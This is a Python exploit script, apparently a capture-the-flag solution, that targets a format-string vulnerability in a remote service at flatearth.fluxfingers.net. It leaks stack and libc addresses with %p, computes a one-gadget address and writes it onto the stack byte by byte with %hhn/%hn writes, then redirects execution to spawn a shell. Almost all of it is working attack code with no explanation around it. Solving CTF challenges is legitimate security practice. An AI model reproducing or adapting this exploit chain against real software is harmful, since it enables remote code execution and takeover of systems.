import phun
import sys

off = 0x71
off2 =0x31

#r = phun.Remote('192.168.122.234',1234)
#raw_input('e')
r = phun.Remote('flatearth.fluxfingers.net',1747)

r.read(' is ')
b=ord(r.read(1))
r.read('?')
xbyte= off + b
if xbyte > 0xff:
    print '[-] sorry :('
    sys.exit(1)

r.write('%' + str(int(xbyte))+ 'c%6$hhn'+ '|%p|' * 100 + "\n")

leak = r.read('My fav')
leak = leak.split('||')

stack_r = int(leak[8],16)+0xb0-8
stack_x = int(leak[4],16)
stack_a = int(leak[45],16)

libc   = int(leak[15],16) - 0x20830
oneshot = libc +  0x4526A 


#p1 = '%' + str(int(xbyte))+ 'c%6$hhn'
base = stack_a& 0xff
for i  in range(15):

    if i % 2:
        base +=1 
        b = base
        idx = 13
    else:

        b = 0 if i > 16 else (oneshot>>(8*(i/2)))&0xff 
        idx = [65,55,63,71,79,87,95,103,3][(i/2)]

    p = ''
    r.read('?')
    bb = (stack_r) & 0xffff
    p += '%' + str(bb) + 'c%6$hn'
    bb = bb&0xff
    if bb > b:
        b  = (0x100 + b)-bb
    else:
        b = b - bb
#    print idx,hex(b)
    p +='%' + str(b) + 'c%' + str(idx) +'$hhn'
    p += "\n"        
    r.write(p)
    stack_r -= 0x20

print '[*] one-shot setted up'
base =  (stack_a + 0x38)&0xffff
for i in range(4):
    if i % 2:
        b = 0
        idx = [111,119][(i/2)]
    else:
        b = base
        base += 4
        idx = 13

    r.read('?')
    p = ''
    bb = (stack_r) & 0xffff
    if not b:
        p +='%' + str(idx) +'$n'
        p += '%' + str(bb) + 'c%6$hn'    
    else:
        p += '%' + str(bb) + 'c%6$hn'
        b = b - bb
        p +='%' + str(b) + 'c%' + str(idx) +'$hn'        

    
    p += "\n"        
    r.write(p)
    stack_r -= 0x20

print '[*] arg nulled out'
r.read('?')
bb = (stack_a & 0xffff) - 8
r.write('%' + str(bb) + 'c%6$hn|\n')
r.read('|')
print '[+] shell?'
r.shell()